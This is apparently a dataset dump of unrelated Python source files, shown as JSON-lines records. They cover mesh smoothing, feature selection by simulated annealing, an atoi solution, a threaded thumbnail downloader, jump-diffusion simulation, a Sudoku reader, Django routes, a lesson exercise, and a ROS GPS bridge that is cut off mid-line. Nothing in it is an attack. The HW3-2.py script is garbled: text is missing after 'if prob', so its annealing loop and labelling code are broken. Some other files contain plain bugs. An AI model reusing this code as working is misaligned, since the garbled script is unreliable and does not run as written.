            xSurface[i] = _self.boundary.X[_self.boundary.surface[i]]\n            ySurface[i] = _self.boundary.Y[_self.boundary.surface[i]]\n\n        # VERY SLOW ROUTINE\n        closer = geometry.dsearchn(xSurface,ySurface,_self.X,_self.Y)\n\n    def moveXPoints(_self,_vec,_dt):\n        \"\"\"\n        Move points in X direction\n        input: velocity vector _vec and time step _dt\n        output: mesh and boundary mesh X coordinate modified\n        \"\"\"\n\n        #X = X + _vec*_dt;\n        for i in range(0,_self.numVerts):\n            aux = _self.X[i]+(_vec[i]*_dt)\n            _self.X[i] = aux\n\n        for i in range(0,_self.boundary.numVerts):\n            aux = _self.boundary.X[i]+(_vec[i]*_dt)\n            _self.boundary.X[i] = aux\n\n\n    def moveYPoints(_self,_vec,_dt):\n        \"\"\"\n        Move points in Y direction\n        input: velocity vector _vec and time step _dt\n        output: mesh and boundary mesh Y coordinate modified\n        \"\"\"\n\n        #Y = Y + _vec*_dt;\n        for i in range(0,_self.numVerts):\n            aux = _self.Y[i]+(_vec[i]*_dt)\n            _self.Y[i] = aux\n\n        for i in range(0,_self.boundary.numVerts):\n            aux = _self.boundary.Y[i]+(_vec[i]*_dt)\n            _self.boundary.Y[i] = aux\n\n    def centroidPositionCorrection(_self):\n        for i in range(0,_self.numElems):\n            v1 = _self.IEN[i][0]\n            v2 = _self.IEN[i][1]\n            v3 = _self.IEN[i][2]\n            v4 = _self.IEN[i][3]\n\n            centroid = geometry.getCentroid(_self.X[v1],_self.Y[v1],\n                                            _self.X[v2],_self.Y[v2],\n                                            _self.X[v3],_self.Y[v3] )\n\n            _self.X[v4] = centroid[0]\n            _self.Y[v4] = centroid[1]\n\n    def laplacianSmooth(_self):\n        \"\"\"\n        Defining the Laplacian smooth operator for a 2D mesh.\n        This method moves the points according to their neighbors.\n        \"\"\"\n        uSmooth = np.zeros((_self.numVerts,1),dtype=float)\n        vSmooth = np.zeros((_self.numVerts,1),dtype=float)\n\n        for i in range(0,_self.numVerts):\n            xSum = 0\n            ySum = 0\n            distSum = 0\n            vertList = _self.neighborVert[i] \n\n            # iterate over the neighbor vertices themselves, not over a range\n            for vert in vertList:\n                if vert < _self.numVerts:\n                    P0x = _self.X[i]\n                    P0y = _self.Y[i]\n                    P1x = _self.X[vert]\n                    P1y = _self.Y[vert]\n                    dist = geometry.distance(P0x,P0y,P1x,P1y)\n                    distSum = distSum + dist\n                    xSum = xSum + (P1x - P0x)*dist\n                    ySum = ySum + (P1y - P0y)*dist\n\n            uSmooth[i] = (2.0/distSum)*xSum\n            vSmooth[i] = (2.0/distSum)*ySum\n\n        # hand the smoothing velocities back so they can be applied with\n        # moveXPoints/moveYPoints\n        return uSmooth, vSmooth\n\n\nclass LineMesh:\n    def __init__(_self):\n        \"\"\"\n        Class LineMesh\n        \"\"\"\n        _self.numVerts = 0\n        _self.numNodes = 0\n        _self.numElems = 0\n        _self.X = 0\n        _self.Y = 0\n        _self.IEN = 0\n        _self.numberOfBoundaries = 0\n        _self.physicalName = 0\n        _self.vertIdRegion = 0\n        _self.elemIdRegion = 0\n        _self.Marker = 0\n        _self.vertPhysicalName = []\n        _self.elemPhysicalName = []\n        _self.neighborElem = []\n        _self.minLength = []\n        _self.idMinLength = []\n        _self.maxLength = []\n        _self.idMaxLength = []\n        _self.sumLength = []\n        _self.averageLineLength = []\n        _self.mesh = 0\n        _self.xNormal = []\n        _self.yNormal = []\n        _self.curvature = []\n        _self.boundaryVert = []\n\n    def readMSH(_self,_dir,_filename):\n        \"\"\"\n        Read boundary .MSH file created from GMsh and assign values to\n        X,Y,IEN numpy arrays.\n        Ex. readMSH('/home/user/gmsh/','retangle.msh')\n        This method also selects the priority boundary conditions to be set on the\n        vertPhysicalName vector. Note that only these names will be written on top of\n        the others. 
Due to the assignment of boundary condition in the element and not\n in the vertex, a corner point may have 2 types of boundary condition,\n therefore the priority will set the correct one.\n \"\"\"\n mshFile = open(_dir+_filename,'r')\n lines = mshFile.readlines()\n\n lineNr = 0\n while \"$PhysicalNames\" not in lines[lineNr]:\n lineNr += 1\n\n lineNr += 1\n _self.numberOfBoundaries = int(lines[lineNr])\n\n lineNr += 1\n _self.physicalName = [[] for i in range(_self.numberOfBoundaries)]\n for line in range(0,_self.numberOfBoundaries):\n aux = lines[lineNr].split()\n _self.physicalName[line] = aux[2]\n lineNr += 1\n\n while \"$Elements\" not in lines[lineNr]:\n lineNr += 1\n\n lineNr += 1\n totalNumElems = int(lines[lineNr])\n\n count = 0\n lineNr += 1\n lineOld = lineNr\n while len( lines[lineNr].split() ) == 7:\n count += 1\n lineNr += 1\n\n _self.numElems = count\n _self.IEN = np.zeros((_self.numElems,2),dtype=int)\n _self.elemIdRegion = np.zeros((_self.numElems,1),dtype=int)\n _self.elemPhysicalName = [[] for i in range(_self.numElems)]\n _self.numVerts = _self.numElems\n _self.vertIdRegion = np.zeros((_self.numVerts,1),dtype=int)\n\n lineNr = lineOld\n for line in range(0,_self.numElems):\n vertices = lines[lineNr].split()\n bound = int(vertices[3])-1\n v1 = int(vertices[5])-1\n v2 = int(vertices[6])-1\n _self.IEN[line] = [v1,v2]\n\n # elemPhysicalName: numElems size\n # vector that the PhysicalName is identified (see .msh file)\n _self.elemPhysicalName[line] = _self.physicalName[bound][1:-1]\n \n # vertIdRegion and elemIdRegion: 0 for all wall types and 1,2,3... for\n # bubbles or drops\n if 'wall' in _self.physicalName[bound]:\n _self.vertIdRegion[v1] = 0\n _self.vertIdRegion[v2] = 0\n _self.elemIdRegion[line] = 0\n else:\n _self.vertIdRegion[v1] = _self.physicalName[bound][7:-1] # 'bubble1' -> 1\n _self.vertIdRegion[v2] = _self.physicalName[bound][7:-1] # 'bubble10 -> 10\n _self.elemIdRegion[line] = _self.physicalName[bound][7:-1]\n\n lineNr += 1\n\n lineNr = 0\n while \"$Nodes\" not in lines[lineNr]:\n lineNr += 1\n\n _self.X = np.zeros((_self.numVerts,1),dtype=float)\n _self.Y = np.zeros((_self.numVerts,1),dtype=float)\n\n lineNr += 2\n for line in range(0,_self.numVerts):\n coords = lines[lineNr].split()\n _self.X[line] = float(coords[1])\n _self.Y[line] = float(coords[2])\n lineNr += 1\n\n # assign boundary names to vertPhysicalName \n _self.vertPhysicalName = [[] for i in range(_self.numVerts)]\n\n # 3rd. priority loop\n for elem in range(0,_self.numElems):\n v1 = _self.IEN[elem][0]\n v2 = _self.IEN[elem][1]\n boundary = _self.elemPhysicalName[elem]\n _self.vertPhysicalName[v1] = boundary\n _self.vertPhysicalName[v2] = boundary\n\n if \"NormalU\" in boundary or \"NormalV\" in boundary:\n _self.vertPhysicalName[v1] = boundary\n _self.vertPhysicalName[v2] = boundary\n\n # 2nd. priority loop\n for elem in range(0,_self.numElems):\n v1 = _self.IEN[elem][0]\n v2 = _self.IEN[elem][1]\n boundary = _self.elemPhysicalName[elem]\n\n if \"InflowU\" in boundary or \"InflowV\" in boundary or \\\n \"InflowUParabolic\" in boundary or \"InflowVParabolic\" in boundary:\n _self.vertPhysicalName[v1] = boundary\n _self.vertPhysicalName[v2] = boundary\n\n # 1st. 
priority loop\n for elem in range(0,_self.numElems):\n v1 = _self.IEN[elem][0]\n v2 = _self.IEN[elem][1]\n boundary = _self.elemPhysicalName[elem]\n\n if \"NoSlip\" in boundary or \"NoSlipConcentration\" in boundary or \\\n \"NoSlipPressure\" in boundary or \"InvU\" in boundary or \\\n \"InvV\" in boundary or \"Inflow2Bubbles\" in boundary:\n _self.vertPhysicalName[v1] = boundary\n _self.vertPhysicalName[v2] = boundary\n\n def setInterfaceBC(_self):\n _self.vertIdRegion = np.zeros((_self.numVerts,1),dtype=int)\n _self.Marker = np.zeros((_self.numVerts,1),dtype=float)\n\n for i in range(0,_self.numElems):\n v1 = _self.IEN[i][0]\n v2 = _self.IEN[i][1]\n _self.vertIdRegion[v1] = _self.elemIdRegion[i]\n _self.vertIdRegion[v2] = _self.elemIdRegion[i]\n\n if _self.elemIdRegion[i] > 0:\n _self.Marker[v1] = 0.5\n _self.Marker[v2] = 0.5\n\n def getNormalAndKappa(_self,_node,_myList):\n P0x = _self.X[_node]\n P0y = _self.Y[_node]\n\n fx = 0\n fy = 0\n sumLength = 0;\n sumXCrossUnit = 0;\n sumYCrossUnit = 0;\n\n listSize = len(_myList)\n for i in range(0,listSize-1):\n v1 = _myList[0]\n v2 = _myList[1]\n\n # v2 surfaceNode v1\n # x ------- x ------- x (surface region)\n # (2Unit) <---- ----> (1Unit)\n #\n P1x = _self.X[v1];\n P1y = _self.Y[v1];\n P2x = _self.X[v2];\n P2y = _self.Y[v2];\n\n # distance of 0 - 1\n a = geometry.distance(P0x,P0y,P1x,P1y);\n\n # distance of 0 - 2\n b = geometry.distance(P0x,P0y,P2x,P2y);\n \n # vetors\n x1Unit = (P1x-P0x)/a;\n y1Unit = (P1y-P0y)/a;\n\n x2Unit = (P2x-P0x)/b\n y2Unit = (P2y-P0y)/b\n\n fx = x1Unit+x2Unit\n fy = y1Unit+y2Unit\n\n # 2D rotation of z = 90 degrees\n # x' = x*cos(z) - y*sin(z)\n # y' = x*sin(z) + y*cos(z)\n sumXCrossUnit = -y1Unit*1 + y2Unit*1\n sumYCrossUnit = +x1Unit*1 - x2Unit*1\n\n # 1/2 of length P0-P1 and P0-P2\n sumLength = (a+b)/2.0\n\n length = geometry.vectorLength(sumXCrossUnit,sumYCrossUnit);\n\n xNormalUnit = sumXCrossUnit/length\n yNormalUnit = sumYCrossUnit/length\n\n # intensidade da forca resultante\n force = np.sqrt( (fx*fx)+(fy*fy) )\n\n # direction of force at node -> outward\n if( (fx*xNormalUnit+fy*yNormalUnit) > 0.0 ):\n force = -force;\n\n pressure = force/sumLength\n\n vec = np.zeros((3,1),dtype=float)\n vec[0] = pressure\n vec[1] = xNormalUnit\n vec[2] = yNormalUnit\n return vec\n\n def setSurface(_self):\n _self.surface = _self.Marker == 0.5\n _self.surface = _self.surface.nonzero()[0]\n\n def setNormalAndKappa(_self):\n _self.setSurface()\n _self.setNeighbor()\n _self.xNormal = np.zeros((_self.numVerts,1),dtype=float)\n _self.yNormal = np.zeros((_self.numVerts,1),dtype=float)\n _self.curvature = np.zeros((_self.numVerts,1),dtype=float)\n for i in range(0,len(_self.surface)):\n node = _self.surface[i]\n\n myList = _self.getNeighborPoint(node)\n vec = _self.getNormalAndKappa(node,myList)\n\n _self.xNormal[node] = vec[0]\n _self.yNormal[node] = vec[1]\n _self.curvature[node] = vec[2]\n\n def setNeighbor(_self):\n _self.neighborElem = [[] for i in range(_self.numVerts)]\n for i in range(0,_self.numElems):\n for j in range(0,2):\n v = _self.IEN[i][j]\n _self.neighborElem[v].append(i)\n \n def getNeighborPoint(_self,_node):\n elem1 = _self.neighborElem[_node][0]\n elem2 = _self.neighborElem[_node][1]\n node1 = _self.IEN[elem1][0];node2 = _self.IEN[elem1][1]\n node3 = _self.IEN[elem2][0];node4 = _self.IEN[elem2][1]\n if node1 == node3 or node1 == node4:\n verts = [node2,node3]\n else:\n verts = [node4,node1]\n return verts\n\n def stats(_self):\n \"\"\"\n fora e dentro das bolhas\n _self.elemIdRegion == 0 --> wall\n 
_self.elemIdRegion == 1 --> bubble 1\n _self.elemIdRegion == 2 --> bubble 2 , etc\n \"\"\"\n _self.minLength = [1E10]*(_self.elemIdRegion.max()+1)\n _self.idMinLength = [0]*(_self.elemIdRegion.max()+1)\n _self.maxLength = [-1E10]*(_self.elemIdRegion.max()+1)\n _self.idMaxLength = [0]*(_self.elemIdRegion.max()+1)\n _self.sumLength = [0]*(_self.elemIdRegion.max()+1)\n _self.averageLineLength = [0]*(_self.elemIdRegion.max()+1)\n\n count = [0]*(_self.elemIdRegion.max()+1)\n for e in range(0,_self.numElems):\n v1 = _self.IEN[e][0]\n p1x = _self.X[v1] \n p1y = _self.Y[v1] \n\n v2 = _self.IEN[e][1]\n p2x = _self.X[v2] \n p2y = _self.Y[v2] \n\n elemID = _self.elemIdRegion[e];\n length = geometry.distance(p1x,p1y,p2x,p2y)\n\n _self.sumLength[elemID] += length;\n\n if length < _self.minLength[elemID]:\n _self.minLength[elemID] = length\n _self.idMinLength[elemID] = e\n if length > _self.maxLength[elemID]: \n _self.maxLength[elemID] = length\n _self.idMaxLength[elemID] = e\n\n count[elemID] += 1\n for nb in range(0,_self.elemIdRegion.max()+1):\n _self.averageLineLength[nb] = _self.sumLength[nb]/count[nb]\n\n\n\n","sub_path":"Mesh.py","file_name":"Mesh.py","file_ext":"py","file_size_in_byte":25726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"150127527","text":"import pandas as pd\nimport numpy as np\nimport random\nimport math\n\ndef gen_features(data, status):\n k = 0\n features = np.empty((int(sum(status)),62))\n for i in range(len(data)):\n if status[i]==1:\n features[k] = data[i]\n k = k+1\n return features\n\ndef classify(data, label):\n A = 0\n for i in range(len(label)):\n if label[i] == 1:\n A = A+1\n a=0\n b=0\n classA = np.empty((A,2000))\n classB= np.empty((len(label)-A,2000))\n for s in range(len(label)):\n if label[s] ==1:\n classA[a] = data.T[s]\n a = a+1\n else:\n classB[b] = data.T[s]\n b = b+1\n return classA, classB\n\ndef obj(data, label):\n A = 0\n B = 0\n for i in range(len(data)):\n A = A + abs(np.corrcoef(data[i],label)[1,0])\n mean_A = A/len(data) \n\n for k in range(len(data)):\n for j in range(k, len(data)):\n if k != j:\n B = B + abs(np.corrcoef(data[k],data[j])[1,0])\n mean_B = 2*B/(len(data)*len(data)-len(data))\n return mean_B-mean_A #the smaller the better\n\ndef SA(data, label, cooling_rate, T0, max_iteration, disturbance_num): \n current_status = np.random.uniform(0,2000,2000)\n for i in range(2000):\n if current_status[i]<10:\n current_status[i] = 1\n else:\n current_status[i] = 0\n features = gen_features(data, current_status) \n fitness_curr = obj(features, label) \n temp_status = current_status\n best_status = current_status \n fitness_best = fitness_curr\n T = T0\n \n for i in range(max_iteration):\n disturbance = np.random.randint(0,2000,size=disturbance_num)\n for s in disturbance:\n temp_status[s] = 1-temp_status[s]\n \n features = gen_features(data, temp_status)\n fitness_temp = obj(features, label) \n delta = fitness_temp - fitness_curr\n \n if delta<0:\n fitness_curr = fitness_temp\n current_status = temp_status\n else:\n prob = random.random()\n if prob0:\n tumor[i] = 1\n else:\n tumor_num = tumor_num+1\n tumor[i] = -1\n \na = SA(genes, tumor, 0.5, 10000, 10, 1)\nprint(a)\n","sub_path":"HW3-2.py","file_name":"HW3-2.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"116497017","text":"import re\n\n\nclass Solution:\n def myAtoi(self, str: str) -> int:\n re_str = r\"\\s*[-|+]?\\d+\"\n res = 
re.match(re_str, str)\n try:\n res = int(res[0].strip(\" \"))\n except:\n return 0\n else:\n return max(min(res, 2**31 - 1), (-2)**31)\n","sub_path":"string-to-integer-atoi/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"489345300","text":"# thumbnail_maker.py\nimport time\nimport os\nimport logging\nfrom urllib.parse import urlparse\nfrom urllib.request import urlretrieve\nfrom queue import Queue\nfrom threading import Thread\n\nimport PIL\nfrom PIL import Image\n\nFORMAT = \"[%(threadName)s, %(asctime)s, %(levelname)s] %(message)s\"\nlogging.basicConfig(filename='logfile.log', level=logging.DEBUG, format=FORMAT)\n\nclass ThumbnailMakerService(object):\n def __init__(self, home_dir='.'):\n self.home_dir = home_dir\n self.input_dir = self.home_dir + os.path.sep + 'incoming'\n self.output_dir = self.home_dir + os.path.sep + 'outgoing'\n self.img_queue = Queue()\n self.dl_queue = Queue()\n\n def download_image(self):\n # We are doing double check for the emptiness of the dl_queue\n # this is done, because there is a situation when a threads comes in there is\n # a last item in the queue, and it asks if the queue is empty, and gets a false result\n # then it gets suspended and another thread is getting that last item from the queue\n # then the first thread is resumed and, trying to get that item, but the queue is empty,\n # therefore an exception of queue.Empty is being thrown, and if we don't catch it we\n # will exit.\n # in the except block we don't need to do anything because the thread will ask the while loop\n # is the queue is empty and now it will get a true result, and will finish it's work\n while not self.dl_queue.empty():\n try:\n url = self.dl_queue.get(block=False)\n # download each image and save to the input dir\n img_filename = urlparse(url).path.split('/')[-1]\n urlretrieve(url, self.input_dir + os.path.sep + img_filename)\n self.img_queue.put(img_filename)\n\n self.dl_queue.task_done()\n except Queue.Empty:\n logging.info('Queue empty')\n\n def download_images(self, img_url_list):\n # validate inputs\n if not img_url_list:\n return\n os.makedirs(self.input_dir, exist_ok=True)\n\n logging.info(\"beginning image downloads\")\n\n start = time.perf_counter()\n for url in img_url_list:\n # download each image and save to the input dir\n img_filename = urlparse(url).path.split('/')[-1]\n urlretrieve(url, self.input_dir + os.path.sep + img_filename)\n self.img_queue.put(img_filename)\n end = time.perf_counter()\n\n self.img_queue.put(None)\n logging.info(\"downloaded {} images in {} seconds\".format(len(img_url_list), end - start))\n\n def perform_resizing(self):\n # validate inputs\n os.makedirs(self.output_dir, exist_ok=True)\n\n logging.info(\"beginning image resizing\")\n target_sizes = [32, 64, 200]\n num_images = len(os.listdir(self.input_dir))\n\n start = time.perf_counter()\n while True:\n filename = self.img_queue.get()\n if filename:\n logging.info(\"resizing image {}\".format(filename))\n orig_img = Image.open(self.input_dir + os.path.sep + filename)\n for basewidth in target_sizes:\n img = orig_img\n # calculate target height of the resized image to maintain the aspect ratio\n wpercent = (basewidth / float(img.size[0]))\n hsize = int((float(img.size[1]) * float(wpercent)))\n # perform resizing\n img = img.resize((basewidth, hsize), PIL.Image.LANCZOS)\n\n # save the resized image to the output dir with a modified file name\n 
new_filename = os.path.splitext(filename)[0] + \\\n '_' + str(basewidth) + os.path.splitext(filename)[1]\n img.save(self.output_dir + os.path.sep + new_filename)\n\n os.remove(self.input_dir + os.path.sep + filename)\n logging.info(\"done resizing image {}\".format(filename))\n self.img_queue.task_done()\n # This else is when the posion pill consumed and the message is None\n else:\n self.img_queue.task_done()\n break\n end = time.perf_counter()\n\n logging.info(\"created {} thumbnails in {} seconds\".format(num_images, end - start))\n\n def make_thumbnails(self, img_url_list):\n logging.info(\"START make_thumbnails\")\n\n start = time.perf_counter()\n # Here we are downloading all the images and storing them into a mq \n # dl_queue, we did this in order to avoid, many threads downloading\n # from the resource concurrently, and my cause a ddos to the web service.\n for img_url in img_url_list:\n self.dl_queue.put(img_url)\n # Here we are triggering 4 threads that will get a url from the dl_queue\n # and then will download the image, after each thread is finish with the download\n # it will mark the task as task_done, we need this because dl_queue is triggered a\n # dl_queue.join() method in order the know when threads finished downloading all images\n # before we used a second queue for storing the url's, we had only 1 queue,\n # that the threads stored the images inside, and the thread that is responsible for \n # the resizing consumed the images from that queue\n num_dl_threads = 4\n for _ in range(num_dl_threads):\n t = Thread(target=self.download_image)\n t.start()\n # triggering a thread for handle all the downloaded images, the was putted inside the\n # img_queue\n t2 = Thread(target=self.perform_resizing)\n t2.start()\n\n # In order for us to know when to put the poison pill described below, we will wait for\n # all the tasks in the dl_queue to be done, and then we know that all images were downloaded\n # and now we can put the poison pill inside the img_queue, for the resize thread to consume \n # and exit the infinite loop\n self.dl_queue.join()\n # This is how the thread responsible for resizing will know how to finish his work\n # it is called a posion pill, the resizing thread will consume this None message and \n # will to know that all images were resized\n\n self.img_queue.put(None)\n # we don't want to join here for the 4 producer threads becuase the important threads\n # is the resize thread, and that's because we know that when the resize thread is done,\n # there are no more images to resize and therefore we can exit\n t2.join()\n\n end = time.perf_counter()\n logging.info(\"END make_thumbnails in {} seconds\".format(end - start))\n","sub_path":"mt-queues/thumbnail_make.py","file_name":"thumbnail_make.py","file_ext":"py","file_size_in_byte":6761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"589646873","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 12 12:57:08 2019\r\n\r\n@author: HP\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom sn_random_numbers import sn_random_numbers\r\nfrom simulation_class import simulation_class\r\nclass jump_diffusion(simulation_class):\r\n '''\r\n base on jump diffsuion to generate simulated paths\r\n '''\r\n def __init__(self,name,mar_env,corr=False):\r\n super(jump_diffusion,self).__init__(name,mar_env,corr)\r\n try:\r\n self.lamb=mar_env.get_constant('lambda')\r\n self.mu=mar_env.get_constant('mu')\r\n self.delt=mar_env.get_constant('delta')\r\n except:\r\n print 
(\"Error parsing market environment\")\r\n    def update(self,initial_value=None,volatility=None,lamb=None,mu=None,delta=None,final_date=None):\r\n        if initial_value is not None:\r\n            self.initial_value=initial_value\r\n        if volatility is not None:\r\n            self.volatility=volatility\r\n        if lamb is not None:\r\n            self.lamb=lamb\r\n        if mu is not None:\r\n            self.mu=mu\r\n        if delta is not None:\r\n            self.delt=delta\r\n        if final_date is not None:\r\n            self.final_date=final_date\r\n        self.instrument_values=None\r\n    def generate_paths(self,fixed_seed=False,day_count=365.):\r\n        if self.time_grid is None:\r\n            self.generate_time_grid()\r\n        M=len(self.time_grid)\r\n        I=self.paths\r\n        paths=np.zeros((M,I))\r\n        paths[0]=self.initial_value\r\n        if self.correlated is False:\r\n            sn1=sn_random_numbers((1,M,I),fixed_seed=fixed_seed)\r\n        else:\r\n            sn1=self.random_numbers\r\n        sn2=sn_random_numbers((1,M,I),fixed_seed=fixed_seed)\r\n        rj=self.lamb*(np.exp(self.mu+0.5*self.delt**2)-1)\r\n        short_rate=self.discount_curve.short_rate\r\n\r\n        for t in range(1,len(self.time_grid)):\r\n            if self.correlated is False:\r\n                ran=sn1[t]\r\n            else:\r\n                ran=np.dot(self.cholesky_matrix,sn1[:,t,:])\r\n                ran=ran[self.rn_set]\r\n            dt=(self.time_grid[t]-self.time_grid[t-1]).days/day_count\r\n            poi=np.random.poisson(self.lamb*dt,I)\r\n            # multiplicative update: diffusion part plus compensated jump part\r\n            paths[t]=paths[t-1]*(np.exp((short_rate-rj-0.5*self.volatility**2)*dt+self.volatility*np.sqrt(dt)*ran)+(np.exp(self.mu+self.delt*sn2[t])-1)*poi)\r\n        self.instrument_values=paths\r\n","sub_path":"dx/jump_diffusion.py","file_name":"jump_diffusion.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"397385390","text":"import random\n\nclass Sudoku():\n    def __init__(self, a):\n        self.meret = int(len(a)**(1/2))\n        self.kezdo_allapot = a\n\n    def print(self):\n        for i in range(len(self.kezdo_allapot)):\n            c = self.kezdo_allapot[i]\n            if c == \"0\":\n                print(\"_\", end=\" \")\n            else:\n                print(c, end=\" \")\n\n            if i % self.meret == self.meret-1:\n                print()\n\n\nfeladvanyok = []\nwith open(\"feladvanyok.txt\", \"r\") as file:\n    for sor in file:\n        s = Sudoku(sor.strip())\n        feladvanyok.append(s)\n\nprint(f\"Task 3: read {len(feladvanyok)} puzzles\")\n\nf4_meret=int(input(\"Task 4: enter a number from 4 to 9: \"))\nwhile f4_meret<4 or f4_meret>9:\n    f4_meret=int(input(\"Task 4: enter a number from 4 to 9: \"))\n\nf4_feladv=list(filter(lambda f: f.meret==f4_meret, feladvanyok))\nprint(f\"number of {f4_meret}x{f4_meret} puzzles: {len(f4_feladv)}\")\n\n\nrandom_index=random.randint(0,len(f4_feladv)-1)\n\nprint(f\"Task 5: the selected puzzle:\")\nrandom_feladvany=f4_feladv[random_index]\nprint(random_feladvany.kezdo_allapot)\n# print(random.choice(f4_feladv).kezdo_allapot)\n\n\nr_string=random_feladvany.kezdo_allapot\n\nf6_mo=(len(r_string)-r_string.count(\"0\"))/len(r_string)*100\n\nprint(f\"Task 6: puzzle fill level (%): {f6_mo:.0f}\")\n\n\nprint(f\"Task 7: the puzzle printed as a grid\")\nrandom_feladvany.print()\n\nprint(\"Task 8: writing the puzzles to a file\")\n\nwith open(f\"sudoku{f4_meret}.txt\", \"w\") as ofile:\n    for f in f4_feladv:\n        ofile.write(f.kezdo_allapot)\n        ofile.write(\"\\n\")\n\n\n# for f in feladvanyok:\n#     f.print()\n","sub_path":"python/11_26/sudokuCLI.py","file_name":"sudokuCLI.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"629219727","text":"\r\ndef str_perm(s):\r\n\r\n    out = []\r\n\r\n    if len(s) <= 1:\r\n        return s\r\n    else:\r\n        for i, let in enumerate(s):\r\n            for perm in str_perm(s[:i]+ s[i+1:]):\r\n                out += [let + perm]\r\n    return out\r\n\r\na = str_perm('abcd')\r\nprint(a)\r\n\r\n\r\n","sub_path":"python_programs/Recursion/string_permutation.py","file_name":"string_permutation.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"84281450","text":"from django.urls import path, re_path\n\nfrom . import views\n\napp_name = 'esm'\nurlpatterns = [\n    path('', views.home, name='home'),\n    path('login/', views.user_login, name='login'),\n    path('logout/', views.user_logout, name='logout'),\n    path('signup/', views.signup, name='signup'),\n    path('create/', views.create, name='create'),\n    path('search/', views.search, name='search'),\n    path('search/', views.search_es, name='search_es'),\n    path('get_question_search/', views.search_get_question, name='get_question_search'),\n    path('get_question//', views.create_get_question, name='get_question'),\n    path('create/edit//', views.create_edit_es, name='edit'),\n    path('create/edit/save_question//', views.create_save_question, name='save_question'),\n    path('create/edit/delete_choice/', views.create_del_choice, name='del_choice'),\n    path('account/', views.account, name='account'),\n\n]","sub_path":"ESMarketplace/esm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"4167606","text":"# Lesson 3. 
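Task 1 (task_1):\n# In the range of natural numbers from 2 to 99, determine how many of them\n# are divisible by each of the numbers in the range 2 to 9.\n# Sanity check for the loop below: i = 2 matches 49 numbers (2, 4, ..., 98)\n# and i = 9 matches 11 numbers (9, 18, ..., 99).\n\n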
{"seq_id":"84281450","text":"from django.urls import path, re_path\n\nfrom . import views\n\napp_name = 'esm'\nurlpatterns = [\n    path('', views.home, name='home'),\n    path('login/', views.user_login, name='login'),\n    path('logout/', views.user_logout, name='logout'),\n    path('signup/', views.signup, name='signup'),\n    path('create/', views.create, name='create'),\n    path('search/', views.search, name='search'),\n    path('search/', views.search_es, name='search_es'),\n    path('get_question_search/', views.search_get_question, name='get_question_search'),\n    path('get_question//', views.create_get_question, name='get_question'),\n    path('create/edit//', views.create_edit_es, name='edit'),\n    path('create/edit/save_question//', views.create_save_question, name='save_question'),\n    path('create/edit/delete_choice/', views.create_del_choice, name='del_choice'),\n    path('account/', views.account, name='account'),\n\n]","sub_path":"ESMarketplace/esm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"4167606","text":"# Lesson 3. Task 1 (task_1):\n# In the range of natural numbers from 2 to 99, determine\n# how many of them are divisible by each of the numbers in the range 2 to 9.\n\nfor i in range(2, 10):\n    temp_count = 0\n    for n in range(2, 100):\n        if not n % i:\n            temp_count += 1\n    print(f'{temp_count} numbers are divisible by {i}.')\n","sub_path":"lesson_03/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"470912178","text":"#!/usr/bin/python\n\nimport time\nimport traceback\nimport socket\nimport json\nimport numpy\n\nimport rospy\n\nfrom std_msgs.msg import Header, Float64\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Pose, PoseWithCovariance, Twist, TwistWithCovariance, Point, Vector3, Quaternion, TransformStamped, Transform\nfrom tf.msg import tfMessage\n\n\nrospy.init_node('sdgps_solution_ros_bridge')\n\nhost = rospy.get_param('~host', '127.0.0.1')\nport = rospy.get_param('~port')\nchild_frame_id = rospy.get_param('~child_frame_id')\ndecimation = rospy.get_param('~decimation', 1)\n\nodom_pub = rospy.Publisher('odom', Odometry)\nabsodom_pub = rospy.Publisher('absodom', Odometry)\nclock_error_pub = rospy.Publisher('clock_error', Float64)\n\ntf_pub = rospy.Publisher('/tf', tfMessage)\n\ndef go():\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect((host, port))\n    \n    first = True\n    \n    buf = ''\n    count = 0\n    while True:\n        d = s.recv(2**12)\n        if not d:\n            break\n        buf += d\n        \n        lines = buf.split('\\n')\n        buf = lines[-1]\n        for line in lines[:-1]:\n            if first:\n                first = False\n                continue\n            \n            if count % decimation == 0:\n                d = json.loads(line)\n                \n                ecef_cov = numpy.array(d['X_position_relative_position_orientation_ecef_covariance'])\n                absodom_pub.publish(Odometry(\n                    header=Header(\n                        stamp=rospy.Time.from_sec(d['timestamp']*1e-9),\n                        frame_id='/ecef',\n                    ),\n                    child_frame_id=child_frame_id,\n                    pose=PoseWithCovariance(\n                        pose=Pose(\n                            position=Point(*d['position_ecef']),\n                            orientation=Quaternion(**d['orientation_ecef']),\n                        ),\n                        covariance=numpy.vstack((\n                            numpy.hstack((ecef_cov[0:3, 0:3], ecef_cov[0:3, 6:9])),\n                            numpy.hstack((ecef_cov[6:9, 0:3], ecef_cov[6:9, 6:9])),\n                        )).flatten(),\n                    ),\n                    twist=TwistWithCovariance(\n                        twist=Twist(\n                            linear=Vector3(*d['velocity_body']),\n                            angular=Vector3(*d['angular_velocity_body']),\n                        ),\n                        covariance=numpy.vstack((\n                            numpy.hstack((d['X_velocity_body_covariance'], numpy.zeros((3, 